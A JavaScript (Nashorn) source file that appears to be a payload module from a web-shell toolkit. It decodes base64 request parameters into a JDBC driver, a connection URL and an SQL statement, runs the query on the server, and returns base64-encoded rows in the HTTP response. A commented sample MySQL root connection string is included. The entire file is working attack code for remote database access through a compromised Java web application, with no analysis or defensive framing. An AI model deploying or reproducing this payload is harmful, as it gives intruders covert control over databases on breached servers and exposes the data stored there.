try {
  load("nashorn:mozilla_compat.js");
} catch (e) {}
importPackage(Packages.java.util);
importPackage(Packages.java.lang);
importPackage(Packages.java.io);
var output = new StringBuffer("");
var cs = "UTF-8";
var tag_s = "->|";
var tag_e = "|<-";

function decode(str) {
  return byte2Str(Base64DecodeToByte(str));
}
function Base64DecodeToByte(str) {
  importPackage(Packages.sun.misc);
  importPackage(Packages.java.util);
  var bt;
  try {
    bt = new BASE64Decoder().decodeBuffer(str);
  } catch (e) {
    bt = new Base64().getDecoder().decode(str);
  }
  return bt;
}
function byte2Str(bt) {
  var result = "";
  for (var i = 0; i < bt.length; i++) {
    // print(result);
    result += String.fromCharCode(bt[i]);
  }
  return result;
}

function Base64Encode(str) {
  importPackage(Packages.sun.misc);
  importPackage(Packages.java.util);
  var ret = "";
  try {
    ret = new Base64().getEncoder().encodeToString(str.getBytes());
  } catch (e) {
    ret = new BASE64Encoder().encode(str.getBytes());
  }
  ret = ret.replaceAll("\r|\n", "");
  return ret;
}

function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
  importPackage(Packages.java.sql);
  var ret = "";
  var x = conn.trim().replace("\r\n", "\n").split("\n");
  Class.forName(x[0].trim());
  var url = x[1];
  var c = DriverManager.getConnection(url);
  var stmt = c.createStatement();
  var isRS = stmt.execute(sql);
  if (isRS) {
    var rs = stmt.getResultSet();
    var rsmd = rs.getMetaData();

    if (needcoluname) {
      for (var i = 1; i <= rsmd.getColumnCount(); i++) {
        var columnName = rsmd.getColumnName(i);
        ret += columnName + columnsep;
      }
      ret += rowsep;
    }

    while (rs.next()) {
      for (var i = 1; i <= rsmd.getColumnCount(); i++) {
        var columnValue = rs.getString(i);
        ret += Base64Encode(columnValue) + columnsep;
      }
      ret += rowsep;
    }
  } else {
    ret += "Result" + columnsep + rowsep;
    var rowCount = stmt.getUpdateCount();
    if (rowCount > 0) {
      ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
    } else if (rowCount == 0) {
      ret +=
        Base64Encode("No rows changed or statement was DDL command") +
        columnsep +
        rowsep;
    } else {
      ret += Base64Encode("False") + columnsep + rowsep;
    }
  }
  return ret;
}

function query(encode, conn, sql) {
  var columnsep = "\t|\t";
  var rowsep = "\r\n";
  return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}

var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));

output.append(query(z1, z2, z3));
// var z1 = "GBK";
// var z2 =
//   "com.mysql.jdbc.Driver\n" +
//   "jdbc:mysql://localhost/mysql?user=root&password=root";
output.append(Base64Encode("test"));

response.getWriter().print(output);
